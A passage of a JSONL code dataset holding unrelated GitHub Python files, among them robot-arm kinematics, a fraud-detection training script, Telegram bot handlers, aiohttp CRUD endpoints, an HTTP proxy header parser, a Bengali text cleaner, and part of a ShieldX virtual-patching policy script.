2)\nL2_2 = math.pow(L1, 2)\nL1L2_2 = 2*L1*L2\n\n# ° to rad: math.radians()\n# rad to °: math.degrees()\ndef foreward_kinematics(alpha_in, gamma_in):\n #print(\"foreward_kinematics({a:.6f}, {g:.6f})\".format(a = math.degrees(alpha_in), g = math.degrees(gamma_in)))\n #sanity tests\n if alpha_in < alpha_min:\n return [False, 0, 0]\n if alpha_in > alpha_max:\n return [False, 0, 0]\n if gamma_in < gamma_min:\n return [False, 0, 0]\n if gamma_in > gamma_max:\n return [False, 0, 0]\n \n if gamma_in == 0:\n # basically OK, where ever alpha_in points, the lengt rf_f == 0 -> so [0, 0]\n return [True, 0, 0]\n\n #scara to polar\n r_foreward_2 = L1_2 + L2_2 - 2*L1*L2*math.cos(gamma_in)\n r_foreward = math.sqrt(r_foreward_2)\n #print(\" rf: {r:.6f}, rf_2: {r2:.6f}\".format(r=r_foreward, r2=r_foreward_2))\n alpha = math.acos((L1_2 + r_foreward_2 - L2_2) / (2*L1*r_foreward))\n alpha_foreward = alpha_in - alpha\n #print(\" alpha: {a:.6f}, alpha_foreward: {a2:.6f}\".format(a=math.degrees(alpha), a2 = math.degrees(alpha_foreward)))\n #polar to kartesian\n xf = r_foreward * math.cos(alpha_foreward) + x_offset\n yf = r_foreward * math.sin(alpha_foreward) + y_offset\n return [True, xf, yf]\n\ndef inverse_kinematics(x_in, y_in):\n #print(\"inverse_kinematics({x:.6f}, {y:.6f})\".format(x = x_in, y = y_in))\n # kartesian to polar\n r_inverse_2 = math.pow(x_in - x_offset, 2) + math.pow(y_in - y_offset, 2)\n r_inverse = math.sqrt(r_inverse_2)\n if r_inverse > L1+L2:\n #error, out of reach\n return [False, 0, 0]\n alpha_inverse = math.atan2(y_in, x_in)\n # polar to scara\n gamma_out = math.acos((L1_2 + L2_2 - r_inverse_2) / L1L2_2 )\n if gamma_out < gamma_min:\n return [False, 0, 0]\n if gamma_out > gamma_max:\n return [False, 0, 0]\n alpha = math.acos((L1_2 + r_inverse_2 - L1_2) / (2*L1*r_inverse))\n #print(\" alpha: {a:.6f}, alpha_inverse: {ai:.6f}\".format(a=math.degrees(alpha), ai=math.degrees(alpha_inverse)))\n alpha_out = (alpha_inverse + alpha)\n if alpha_out < alpha_min:\n return [False, 0, 0]\n if alpha_out > alpha_max:\n return [False, 0, 0]\n return [True, alpha_out, gamma_out]\n","repo_name":"mwuerms/pyscara","sub_path":"scarakinematics.py","file_name":"scarakinematics.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74369925109","text":"\ndef cargar():\n\t\n\tdiccionario={}\n\tcontinua=\"s\"\n\twhile continua==\"s\":\n\t\tespa=input(\"Ingrese la palabra en español que va a buscar: \")\n\t\ting=input(\"Ingrese la palabra en ingles que va a buscar: \")\n\t\tdiccionario[espa]=ing\n\t\tcontinua=input(\"Quiere cargar otra palabra: [s/n]\")\n\treturn diccionario\n\ndef imprimir(diccionario):\n\t\n\tprint(\"Listado completo del Diccionario\")\n\tprint(\"********************************\")\n\tfor ingles in diccionario:\n\t\tprint(ingles, diccionario[ingles])\n\ndef consulta_palabra(diccionario):\n\t\n\tpal=input(\"Ingrese la palabra en castellano a consultar: \")\n\tif pal in diccionario:\n\t\tprint(\"En inglés significa: \", diccionario[pal])\n\n\n# Bloque principal\n\ndiccionario=cargar()\nimprimir(diccionario)\nprint(\"*****************************\")\nconsulta_palabra(diccionario)\n","repo_name":"jhovylimahuaya/Recordando-Python","sub_path":"2 - Ude/Inicio/estructuradeDatosTipoDiccionario.py","file_name":"estructuradeDatosTipoDiccionario.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"17147498986","text":"import pandas as pd\nimport json\nimport os\nfrom joblib import dump\nfrom sklearn.model_selection import StratifiedKFold, cross_val_score\nfrom sklearn.linear_model import LogisticRegression\nimport mlflow\nimport numpy as np\nfrom sklearn.preprocessing import StandardScaler\nimport time\nfrom xgboost import XGBClassifier, plot_importance\nimport matplotlib.pyplot as plt\n\n# Set MLflow tracking URI\nmlflow.set_tracking_uri(\"databricks\")\nmlflow.set_experiment(\"/Users/micolp20022@gmail.com/fraud-model\")\n\n# Set path to inputs\nPROCESSED_DATA_DIR = os.environ[\"PROCESSED_DATA_DIR\"]\ntrain_data_file = 'train.csv'\ntrain_data_path = os.path.join(PROCESSED_DATA_DIR, train_data_file)\n\n# Read data\ntransactions_data = pd.read_csv(train_data_path)\n# Split data into dependent and independent variables\n# X_train_ = transactions_data.drop('fraud', axis=1)\n# df_cleaned = X_train.dropna()\n# df_drop = df_cleaned.drop(columns = ['source','target','device','zipcodeOri','zipMerchant'])\n# category_columns = df_drop.select_dtypes(include=['object']).columns\n# df_encoded = pd.get_dummies(df_drop, columns=category_columns)\n# C = 2*np.pi/12\n# C_ = 2*np.pi/24\n# # Map month to the unit circle.\n# df_encoded[\"month_sin\"] = np.sin(df_encoded['month']*C)\n# df_encoded[\"month_cos\"] = np.cos(df_encoded['month']*C)\n# df_encoded.timestamp = df_encoded.timestamp.values.astype(np.int64) // 10 ** 6\n# df_encoded['hour_sin']=np.sin(df_encoded['hour']*C)\n# df_encoded['hour_cos']=np.cos(df_encoded['hour']*C)\n# df = df_encoded.drop(columns = ['month', 'hour'])\n\n\nscaler = StandardScaler()\n\ny_train = transactions_data['fraud']\nX_train = scaler.fit_transform(transactions_data.drop('fraud', axis=1))\n# Model \n# Specify XGBoost parameters\nxgb_params = {\n 'max_depth': 4,\n 'learning_rate': 0.1,\n 'n_estimators': 100,\n 'subsample': 0.7,\n 'colsample_bytree': 0.8,\n 'objective': 'binary:logistic',\n 'eval_metric': 'logloss'\n}\n\n# Model \nxgb_model = XGBClassifier(**xgb_params)\nxgb_model = xgb_model.fit(X_train, y_train)\n\n# Plot and save feature importance plot\nplt.figure(figsize=(10, 6))\nplot_importance(xgb_model, importance_type='weight')\nfeature_importance_plot_path = \"feature_importance_plot.png\"\nplt.savefig(feature_importance_plot_path)\n# Cross validation\ncv = StratifiedKFold(n_splits=3) \nval_logit = cross_val_score(xgb_model, X_train, y_train, cv=cv).mean()\nval_f1 = cross_val_score(xgb_model, X_train, y_train, cv=cv, scoring = 'f1').mean()\n\n# Validation accuracy to JSON\ntrain_metadata = {\n 'validation_acc': val_logit,\n 'validation_f1':val_f1\n}\n\n# Start an MLflow run\nwith mlflow.start_run():\n\n # Log parameters\n mlflow.log_param(\"max_iter\", 10)\n mlflow.log_params(xgb_params)\n\n # Log the model\n # Log the model with a timestamp in the model name\n timestamp = time.strftime(\"%Y%m%d_%H%M%S\") # Generate timestamp\n model_name_with_timestamp = f\"Xgboost_model_{timestamp}.joblib\"\n mlflow.sklearn.log_model(xgb_model, model_name_with_timestamp)\n\n # Log validation accuracy\n mlflow.log_metric(\"validation_acc\", val_logit)\n mlflow.log_metric(\"f1_score\", val_f1)\n\n # Log metadata\n mlflow.log_params(train_metadata)\n mlflow.log_artifact(feature_importance_plot_path)\n\n# Set path to output (model)\nMODEL_DIR = os.environ[\"MODEL_DIR\"]\nmodel_name = 'xgboost.joblib'\nmodel_path = os.path.join(MODEL_DIR, model_name)\n\n# Serialize and save model\ndump(xgb_model, model_path)\n\n# Set path to output (metadata)\nRESULTS_DIR = os.environ[\"RESULTS_DIR\"]\ntrain_results_file = 'train_metadata.json'\nresults_path = os.path.join(RESULTS_DIR, train_results_file)\n\n# Serialize and save metadata\nwith open(results_path, 'w') as outfile:\n json.dump(train_metadata, outfile)\n\n","repo_name":"khanhvovan2002/mlops-fraud-transactions","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71669400308","text":"from pyrogram import Client, filters\nfrom YukkiMusic.misc import SUDO_USERS as SUDOERS\nfrom YukkiMusic.core.userbot import assistants\nfrom YukkiMusic.utils.database import get_client\n\nif 1 in assistants:\n ASS1 = userbot.one\n\nif 2 in assistants:\n ASS2 = userbot.two\n\n@Client.on_message(\n filters.private\n & filters.incoming\n & ~filters.service\n & ~filters.edited\n & ~filters.me\n & ~filters.bot\n & ~filters.via_bot)\nasync def assistant_(client, message):\n await client.send_message(chat_id=message.from_user.id,text=\"test\")\n","repo_name":"AerodynamicV1Botz/AeroVC_Player","sub_path":"YukkiMusic/plugins/techzbots/assistant.py","file_name":"assistant.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"94"} +{"seq_id":"74259256630","text":"'''\nThis module gives some special admin functionality.\n'''\nfrom config import *\n\ntemp_id = dict()\n\n@bot.message_handler(commands=['admin'])\ndef reply_admin_commands_list(message):\n 'Replies admin_commands dict'\n cid = get_user_id(message)\n\n if cid in admin_users:\n help_text = 'The following commands are available:\\n'\n cmd_list = sorted(list(admin_commands.keys()))\n for key in cmd_list:\n help_text += '/' + str(key) + ': ' + str(admin_commands[key]) + '\\n'\n bot.send_message(cid, help_text)\n\n@bot.message_handler(commands=['addadmin'])\ndef reply_add_admin_cmd(message):\n 'adds an admin'\n cid = get_user_id(message)\n \n if cid in admin_users:\n id_to_add = message.text[10:]\n \n if id_to_add == '':\n markup = types.ForceReply(selective=True)\n replymsg = bot.reply_to(message, 'What\\'s the new admin\\'s ID?\\n/cancel to stop the operation!', reply_markup=markup)\n bot.register_next_step_handler(replymsg, add_admin_step_id)\n\n elif id_to_add.isdigit() == False:\n bot.reply_to(message, 'Ex. /addadmin 1234567')\n return\n\n elif id_to_add.isdigit():\n temp_id[cid] = int(id_to_add)\n markup = types.ForceReply(selective=True)\n replymsg = bot.reply_to(message, 'What\\'s the new admin\\'s name?\\n/cancel to stop the operation!', reply_markup=markup)\n bot.register_next_step_handler(replymsg, add_admin_step_name)\n\ndef add_admin_step_id(message):\n cid = get_user_id(message)\n\n id_to_add = message.text\n if id_to_add == '/cancel':\n return\n \n elif id_to_add.isdigit():\n temp_id[cid] = int(id_to_add)\n markup = types.ForceReply(selective=True)\n replymsg = bot.reply_to(message, 'What\\'s the new admin\\'s name?\\n/cancel to stop the operation!', reply_markup=markup)\n bot.register_next_step_handler(replymsg, add_admin_step_name)\n\ndef add_admin_step_name(message):\n cid = get_user_id(message)\n \n new_name = message.text\n if new_name == '/cancel':\n return\n \n else:\n markup = types.ReplyKeyboardHide(selective=True)\n add_key_dict(admin_users_file, admin_users, temp_id[cid], new_name)\n bot.reply_to(message, 'New admin!ヽ(*⌒∇⌒*)ノ\\n', reply_markup=markup)\n\nadmin_commands['addadmin'] = 'Adds admin by ID.'\n\n@bot.message_handler(commands=['deladmin'])\ndef reply_del_admin_cmd(message):\n 'Deletes an admin'\n cid = get_user_id(message)\n \n if cid in admin_users:\n msg = message.text[10:]\n if msg == '':\n markup = types.ForceReply(selective=True)\n replymsg = bot.reply_to(message, 'What\\'s the admin\\'s ID?\\n/cancel to stop the operation!', reply_markup=markup)\n bot.register_next_step_handler(replymsg, del_admin_step_id)\n \n elif msg.isdigit() == False:\n bot.reply_to(message, 'Ex. /deladmin 1234567')\n return\n \n elif msg.isdigit() and int(msg) in admin_users:\n bot.reply_to(message, 'Bye-bye admin!(´∩`。)\\n' + str(msg) + ' ' + admin_users[int(msg)])\n remove_key_dict(admin_users_file, admin_users, int(msg))\n\ndef del_admin_step_id(message):\n cid = get_user_id(message)\n id_to_del = message.text\n \n if id_to_del == '/cancel':\n return\n \n elif id_to_del.isdigit() and int(id_to_del) in admin_users:\n bot.reply_to(message, 'Bye-bye admin!(´∩`。)\\n' + str(id_to_del) + ' ' + admin_users[int(id_to_del)])\n remove_key_dict(admin_users_file, admin_users, int(id_to_del))\n\nadmin_commands['deladmin'] = 'Deletes admin by ID.'\n\n@bot.message_handler(commands=['admins'])\ndef reply_admin_user_list(message):\n 'Replies admin list'\n cid = get_user_id(message)\n \n if cid in admin_users:\n reply_text = 'My admins (/^▽^)/\\n'\n reply_text += '==================\\n'\n for key in admin_users:\n reply_text += '[' + str(key) + ']: ' + str(admin_users[key]) + '\\n'\n reply_text += '=================='\n bot.reply_to(message, reply_text)\n\t\nadmin_commands['admins'] = 'List of all admins.'\n","repo_name":"CarlitoBriganteNT/parklezbot","sub_path":"plugins/admin_module.py","file_name":"admin_module.py","file_ext":"py","file_size_in_byte":4190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29177778857","text":"import sqlalchemy as sa\nfrom aiohttp import web\nfrom aiojobs.aiohttp import atomic\n\nfrom service.data_classes.project import *\nfrom service.database.tables import project\nfrom service.database.connector import AsyncpgsaStorage\n\n\n@atomic\nasync def create(\n request: web.Request,\n data: RequestProjectCreate = None,\n) -> ResponseProject:\n \"\"\"Create Project.\"\"\"\n\n data: RequestProjectCreate = data or request[\"data\"]\n storage: AsyncpgsaStorage = request.app[\"Storage\"]\n\n values = data.params.dict()\n\n query = project.insert().values(**values).returning(sa.literal_column(\"*\"))\n result = await storage.fetchrow(query)\n\n response = ResponseProject(result=result)\n\n return response\n\n\nasync def read(\n request: web.Request, data: RequestProjectRead = None\n) -> ResponseProjectSeveral:\n \"\"\"Read Project.\"\"\"\n\n data: RequestProjectRead = data or request[\"data\"]\n storage: AsyncpgsaStorage = request.app[\"Storage\"]\n\n query = project.select().where(project.c.id.in_(data.params))\n\n result = await storage.fetch(query)\n response = ResponseProjectSeveral(result=result)\n\n return response\n\n\n@atomic\nasync def update(\n request: web.Request,\n data: RequestProjectUpdate = None,\n) -> ResponseProject:\n \"\"\"Update Project.\"\"\"\n\n data: RequestProjectUpdate = data or request[\"data\"]\n storage: AsyncpgsaStorage = request.app[\"Storage\"]\n\n values = data.params.dict()\n values.pop(\"id\")\n\n query = (\n project.update()\n .where(project.c.id == data.params.id)\n .values(**values)\n .returning(sa.literal_column(\"*\"))\n )\n\n result = await storage.fetchrow(query)\n response = ResponseProject(result=result)\n\n return response\n\n\n@atomic\nasync def delete(\n request: web.Request, data: RequestProjectDelete = None\n) -> ResponseSuccess:\n \"\"\"Delete Project.\"\"\"\n\n data: RequestProjectDelete = data or request[\"data\"]\n storage: AsyncpgsaStorage = request.app[\"Storage\"]\n\n query = project.delete().where(project.c.id.in_(data.params))\n\n await storage.fetch(query)\n\n response = ResponseSuccess()\n\n return response\n\n\nasync def lst(\n request: web.Request, data: RequestProjectList = None\n) -> ResponseProjectSeveral:\n \"\"\"List of Projects.\"\"\"\n\n data: RequestProjectList = data or request[\"data\"]\n storage: AsyncpgsaStorage = request.app[\"Storage\"]\n\n params = data.dict(exclude_unset=True)[\"params\"]\n\n query = project.select()\n\n # Time\n if \"created_gt\" in params:\n query = query.where(\n project.c.created > params[\"created_gt\"].replace(tzinfo=None)\n )\n\n if \"created_lt\" in params:\n query = query.where(\n project.c.created < params[\"created_lt\"].replace(tzinfo=None)\n )\n\n if \"updated_gt\" in params:\n query = query.where(\n project.c.updated > params[\"updated_gt\"].replace(tzinfo=None)\n )\n\n if \"updated_lt\" in params:\n query = query.where(\n project.c.updated < params[\"updated_lt\"].replace(tzinfo=None)\n )\n\n query = query.order_by(project.c.created.desc())\n\n result = await storage.fetch(query)\n response = ResponseProjectSeveral(result=result)\n\n return response\n","repo_name":"etipsin/lovely-service","sub_path":"service/routing/v1/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"13706335369","text":"# 직접적이 인덱스 접근이 어려움\nclass ListNode:\n def __init__(self, index, next_distance=0):\n self.index = index\n self.next = None\n self.next_distance = next_distance\n self.check = False\n\ndef solution(n, weak, dist): \n if len(weak) == 1:\n return 1\n answer = ''\n # 외벽 만들기\n head = prev = ListNode(weak[0])\n for w_idx in weak[1:-1]:\n dist = w_idx - prev.index\n cur = ListNode(w_idx, dist)\n prev.next = cur\n prev = cur\n # 마지막\n dist = (12-weak[-1]) + weak[0]\n tail = ListNode(weak[-1], dist)\n tail.next = head\n \n # 점검 할 수 있는 거 체크\n count = 0\n \n return answer","repo_name":"SoniaComp/Algorithm_Python_2021","sub_path":"D-2/kakao2020/5_1.py","file_name":"5_1.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"28380102447","text":"from datetime import datetime\n\nclass HttpHeader:\n def __init__(self, req):\n self.request = req\n\n def __str__(self):\n return self.request\n\n def get_start_line(self):\n idx = self.request.find('\\n')\n if idx == -1:\n idx = len(self.request)\n return self.request[:idx]\n \n def get_start_line_without_version(self):\n line = self.get_start_line()\n idx = self.request.lower().find('http')\n if idx == -1:\n return line\n return self.request[:idx]\n\n def get_host_line(self):\n idx = self.request.lower().find(\"host\")\n if idx == -1:\n return None\n tmp = self.request[idx:]\n idx2 = tmp.find('\\n')\n return tmp[:idx2]\n\n def transform_request_header(self):\n tmp = self.request.replace(\"/1.1\", \"/1.0\").replace(\"keep-alive\", \"close\")\n return HttpHeader(tmp)\n\n def is_connect(self):\n return self.request.split(' ')[0].lower() == 'connect'\n\n def get_request(self):\n return self.request\n\n def get_version(self):\n idx = self.request.lower().find(\"http/\")\n return self.request[idx:idx+8]\n\n def get_host(self):\n host_line = self.get_host_line()\n if host_line is None:\n return host_line\n start = host_line.lower().find(\"host:\")\n return host_line[start + 6:-1]\n \n def get_port_num(self):\n request = self.request\n port = 80\n l_request = request.lower()\n lines = l_request.split('\\n')\n line = lines[0]\n splits = line.split(\" \")\n splits = splits[1].split(\":\")\n last_part = splits[-1].strip()\n try:\n port = (int)(last_part)\n except:\n pass\n for i in range(1, len(lines)):\n line = lines[i].replace(\" \", \"\")\n if line.startswith(\"host\"):\n parts = line.split(\":\")\n last_part = parts[-1].strip()\n try:\n port = (int)(last_part)\n except:\n pass\n return port\n\n @staticmethod\n def print_date_stamp():\n now = datetime.now()\n time = now.strftime(\"%H:%M:%S\")\n print(f\"{now.day} {now.strftime('%b')} {time} - \", end=\"\")\n","repo_name":"priyanshu87511/Computer-Networks-Lab","sub_path":"112001033_112001049_Assignment4/HttpHeader.py","file_name":"HttpHeader.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"20479787519","text":"\"\"\"\nThis cleantext scripts functions solely depends on clean-text library.\nMost of the functions are copied from clean-text.\n\"\"\"\nimport re\nfrom bnlp.cleantext import constants\nfrom bnlp.corpus.corpus import BengaliCorpus as corpus\n\nfrom ftfy import fix_text\nfrom unicodedata import category, normalize\nfrom emoji import UNICODE_EMOJI, demojize, emojize\n\ndef fix_bad_unicode(text, normalization=\"NFC\"):\n return fix_text(text, normalization=normalization)\n\ndef fix_strange_quotes(text):\n \"\"\"\n Replace strange quotes, i.e., 〞with a single quote ' or a double quote \" if it fits better.\n \"\"\"\n text = constants.SINGLE_QUOTE_REGEX.sub(\"'\", text)\n text = constants.DOUBLE_QUOTE_REGEX.sub('\"', text)\n return text\n\ndef replace_urls(text, replace_with=\"\"):\n \"\"\"\n Replace all URLs in ``text`` str with ``replace_with`` str.\n \"\"\"\n return constants.URL_REGEX.sub(replace_with, text)\n\ndef replace_emails(text, replace_with=\"\"):\n \"\"\"\n Replace all emails in ``text`` str with ``replace_with`` str.\n \"\"\"\n return constants.EMAIL_REGEX.sub(replace_with, text)\n\ndef remove_substrings(text, to_replace, replace_with=\"\"):\n \"\"\"\n Remove (or replace) substrings from a text.\n Args:\n text (str): raw text to preprocess\n to_replace (iterable or str): substrings to remove/replace\n replace_with (str): defaults to an empty string but\n you replace substrings with a token.\n \"\"\"\n if isinstance(to_replace, str):\n to_replace = [to_replace]\n\n result = text\n for x in to_replace:\n result = result.replace(x, replace_with)\n return result\n\ndef remove_emoji(text):\n return remove_substrings(text, UNICODE_EMOJI[\"en\"])\n\ndef remove_number_or_digit(text, replace_with=\"\"):\n return re.sub(constants.BANGLA_DIGIT_REGEX, replace_with, text)\n\ndef remove_punctuations(text, replace_with=\"\"):\n for punc in corpus.punctuations:\n print(punc)\n text = text.replace(punc, replace_with)\n \n return text\n\nclass CleanText(object):\n def __init__(\n self,\n fix_unicode=True,\n unicode_norm=True,\n unicode_norm_form=\"NFKC\",\n remove_url=False,\n remove_email=False,\n remove_number=False,\n remove_digits=False,\n remove_emoji=False,\n remove_punct=False,\n replace_with_url=\"\",\n replace_with_email=\"\",\n replace_with_number=\"\",\n replace_with_digit=\"\",\n replace_with_punct = \"\"\n ):\n self.fix_unicode = fix_unicode\n self.unicode_norm = unicode_norm\n self.unicode_norm_form = unicode_norm_form\n self.remove_url = remove_url\n self.remove_email = remove_email\n self.remove_number = remove_number\n self.remove_digits = remove_digits\n self.remove_emoji = remove_emoji\n self.remove_punct = remove_punct\n \n self.replace_with_url = replace_with_url\n self.replace_with_email = replace_with_email\n self.replace_with_number = replace_with_number\n self.replace_with_digit = replace_with_digit\n self.replace_with_punct = replace_with_punct\n\n def __call__(self, text: str) -> str:\n if text is None:\n text = \"\"\n text = str(text)\n text = fix_strange_quotes(text)\n\n if self.fix_unicode:\n text = fix_bad_unicode(text)\n if self.unicode_norm:\n text = normalize(self.unicode_norm_form, text)\n if self.remove_punct:\n text = remove_punctuations(text, replace_with=self.replace_with_punct)\n if self.remove_url:\n text = replace_urls(text, replace_with=self.replace_with_url)\n if self.remove_email:\n text = replace_emails(text, replace_with=self.replace_with_email)\n if self.remove_emoji:\n text = remove_emoji(text)\n if self.remove_digits:\n text = remove_number_or_digit(text, replace_with=self.replace_with_digit)\n if self.remove_number:\n text = remove_number_or_digit(text, replace_with=self.replace_with_number)\n\n return text\n\n","repo_name":"sagorbrur/bnlp","sub_path":"bnlp/cleantext/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","stars":251,"dataset":"github-code","pt":"94"} +{"seq_id":"2606964837","text":"# standard library\nimport os\nimport sys\nimport argparse\n\n# shieldx library\nfrom sxswagger.common.custom_logger import CustomLogger\nfrom sxswagger.sxapi.rest_session import RestSession as SxSession\n\nfrom sxswagger.sxapi.threat_prevention_policy import ThreatPrevention as TPP\nfrom sxswagger.sxapi.security_policy_set import SecurityPolicySets as SPS\nfrom sxswagger.sxapi.access_control_policy import AccessControl as ACL\nfrom sxswagger.sxapi.cloud_management import CloudManagement as CloudMgmt\n\nclass VirtualPatch(object):\n def __init__(self, rest_session, logger):\n # Logger\n self.logger = logger\n\n # Session\n self.rest_session = rest_session\n\n # Policy Mgmt\n self.tpp_mgmt = TPP(rest_session)\n self.sps_mgmt = SPS(rest_session)\n self.acl_mgmt = ACL(rest_session)\n self.cloud_mgmt = CloudMgmt(rest_session)\n\n # SX Info\n self._source_policy = \"All Threats\"\n self._default_acl_policy = \"Default ACL Policy\"\n\n # Payloads\n self._payload = PolicyPayload()\n\n # Cache All Threats\n self.all_threats_cache = {}\n self._cache_all_threats()\n\n def _cache_all_threats(self):\n tpp = self.tpp_mgmt.get_threat_prevention_policy_by_name(self._source_policy)\n all_threats = self.tpp_mgmt.get_threats_by_policy_id(tpp[\"id\"])\n\n for threat in all_threats:\n key = \"{}:{}\".format(threat[\"protocolID\"], threat[\"threatID\"])\n self.all_threats_cache[key] = threat\n\n def _create_resource_group(self, rg_name, rg_components):\n resource_group = self._payload.get_rg_payload()\n resource_group[\"name\"] = rg_name\n resource_group[\"description\"] = rg_components[\"description\"]\n resource_group[\"purpose\"] = rg_components[\"purpose\"]\n resource_group[\"resourceType\"] = rg_components[\"resource_type\"]\n resource_group[\"memberList\"] = rg_components[\"member_list\"]\n\n rg_id = self.cloud_mgmt.create_resource_group(resource_group)\n\n return rg_id\n\n def _delete_resource_group(self, rg_name):\n is_deleted = self.cloud_mgmt.remove_resource_group_by_name(rg_name)\n\n return is_deleted\n\n def _create_tpp(self, policy_name, tpp_components):\n self.logger.info(\"Creating TPP.\")\n tpp_id = 0\n specific_threats = list()\n\n # Get specific threats\n for threat in tpp_components[\"threats\"]:\n key = \"{}:{}\".format(threat[\"protocolID\"], threat[\"threatID\"])\n\n if key in self.all_threats_cache:\n specific_threats.append(self.all_threats_cache[key])\n else:\n # Rule not found, raise warning\n pass\n\n self.logger.info(\"Specific Threats: {}\".format(specific_threats))\n\n # TPP Payload\n tpp_payload = self._payload.get_tpp_payload()\n self.logger.info(\"TPP Payload - Template: {}\".format(tpp_payload))\n tpp_payload[\"name\"] = policy_name\n tpp_payload[\"rules\"] = [{\"specificThreats\": specific_threats}]\n self.logger.info(\"TPP Payload - Populated: {}\".format(tpp_payload))\n\n tpp_id = self.tpp_mgmt.create_threat_prevention_policy(tpp_payload)\n self.logger.info(\"TPP Created, ID: {}\".format(tpp_id))\n\n return tpp_id\n\n def _edit_response_actions(self, tpp_id, response_actions):\n threat_responses = self.tpp_mgmt.get_threat_responses_by_policy_id(tpp_id)\n\n for threat_response in threat_responses:\n threat_response[\"block\"] = response_actions[\"block\"]\n threat_response[\"policyId\"] = tpp_id\n\n # Bulk Edit - Response Action Payload\n response_payload = self._payload.get_tpp_response_payload()\n response_payload[\"id\"] = tpp_id\n response_payload[\"responses\"] = threat_responses\n\n is_bulk_edit_ok = self.tpp_mgmt.bulk_update_threat_responses(response_payload)\n\n return is_bulk_edit_ok\n\n def _delete_tpp(self, policy_name):\n is_deleted = False\n\n # Get TPP\n tpp = self.tpp_mgmt.get_threat_prevention_policy_by_name(policy_name)\n\n if tpp is not None:\n # Delete\n is_deleted = self.tpp_mgmt.delete_threat_prevention_policy_by_id(tpp[\"id\"])\n else:\n # TPP not found, NOOP\n pass\n\n return is_deleted\n\n def _create_sps(self, policy_name, sps_components):\n # Threat Prevention Policy\n tpp = self.tpp_mgmt.get_threat_prevention_policy_by_name(sps_components[\"threat_prevention\"])\n tpp_id = tpp[\"id\"]\n tpp_name = tpp[\"name\"]\n\n # Malware Policy\n malware_policy_id = None\n malware_policy_name = None\n\n # URL Filtering Policy\n url_filtering_policy_id = None\n url_filtering_policy_name = None\n\n # SPS Payload\n sps_payload = self._payload.get_sps_payload()\n sps_payload[\"name\"] = policy_name\n sps_payload[\"threatPreventionPolicyName\"] = tpp_name\n sps_payload[\"threatPreventionPolicyId\"] = tpp_id\n\n sps_id = self.sps_mgmt.create_security_policy_set(sps_payload)\n self.logger.info(\"SPS Created, ID: {}\".format(sps_id))\n\n return sps_id\n\n def _delete_sps(self, policy_name):\n is_deleted = False\n\n # Get SPS\n sps = self.sps_mgmt.get_sps_by_name(policy_name)\n\n if sps is not None:\n # Delete\n is_deleted = self.sps_mgmt.delete_security_policy_set_by_id(sps[\"id\"])\n else:\n # SPS not found, NOOP\n pass\n\n return is_deleted\n\n def _create_acl_rule(self, acl_rule_name, acl_rule_components):\n # Get Default Access Control Policy\n default_access_control_policy = self.acl_mgmt.get_acl_policies()[0]\n\n self.logger.info(\"Before Add - Default ACP: {}\".format(default_access_control_policy))\n\n # Clone ACL Rule and modify relevant fields\n new_acl_rule = default_access_control_policy[\"aclRules\"][0].copy()\n del(new_acl_rule[\"id\"])\n new_acl_rule[\"name\"] = acl_rule_name\n new_acl_rule[\"description\"] = acl_rule_components[\"description\"]\n new_acl_rule[\"spsId\"] = acl_rule_components[\"sps_id\"]\n new_acl_rule[\"destinationResourceGroupList\"] = [acl_rule_components[\"dst_rg\"]]\n\n # TODO\n # new_acl_rule[\"sourceResourceGroupList\"] = (compute from RG or NS created based on WL IP from vuln scanner)\n # new_acl_rule[\"destinationResourceGroupList\"] = (compute from RG or NS created based on WL IP from vuln scanner)\n\n # Append the new rule\n default_access_control_policy[\"aclRules\"].append(new_acl_rule)\n\n # Fix order number, newly created rule is #1\n acl_rules_count = len(default_access_control_policy[\"aclRules\"])\n\n for acl_rule in default_access_control_policy[\"aclRules\"]:\n acl_rule[\"orderNum\"] = acl_rules_count\n acl_rules_count -= 1\n\n self.logger.info(\"After Add - Default ACP: {}\".format(default_access_control_policy))\n\n is_updated = self.acl_mgmt.update_acl(default_access_control_policy)\n\n self.logger.info(\"ACL Update status: {}\".format(is_updated))\n\n return is_updated\n\n def _delete_acl_rule(self, acl_rule_name):\n # Get Default Access Control Policy\n default_access_control_policy = self.acl_mgmt.get_acl_policies()[0]\n\n self.logger.info(\"Before Del - Default ACP: {}\".format(default_access_control_policy))\n\n # Delete ACL Rule\n index = 0\n for acl_rule in default_access_control_policy[\"aclRules\"]:\n if acl_rule[\"name\"] == acl_rule_name:\n # Pop based on index\n _ = default_access_control_policy[\"aclRules\"].pop(index)\n break\n\n index += 1\n\n self.logger.info(\"After Del - Default ACP: {}\".format(default_access_control_policy))\n\n is_updated = self.acl_mgmt.update_acl(default_access_control_policy)\n\n self.logger.info(\"ACL Update status: {}\".format(is_updated))\n\n return is_updated\n\n def patch(self, artifact):\n # Application Discovery\n\n # 1. Analyze Vulnerability Scanner Output\n # 1a. CVE IDs to ShieldX Rule IDs\n # List of Rules [{\"pm_id\": 6, \"rule_id\": 10114}, ...]\n threat_rules = [{\"protocolID\": 6, \"threatID\": 10114}]\n\n # 1b. List of IP Address (workloads)\n scanner_report_ip_set = [\n {\"id\": 0, \"cidr\": \"192.168.131.5/32\"},\n {\"id\": 0, \"cidr\": \"192.168.131.51/32\"}\n ]\n\n # 2. Create/resuse a resource group for workloads, Insertion = MSN\n rg_name = artifact[\"rg_name\"]\n rg_components = {\n \"description\": \"Virtual Patch - RG\",\n \"purpose\": \"POLICY\",\n \"resource_type\": \"CIDR\",\n \"member_list\": scanner_report_ip_set\n }\n rg_id = 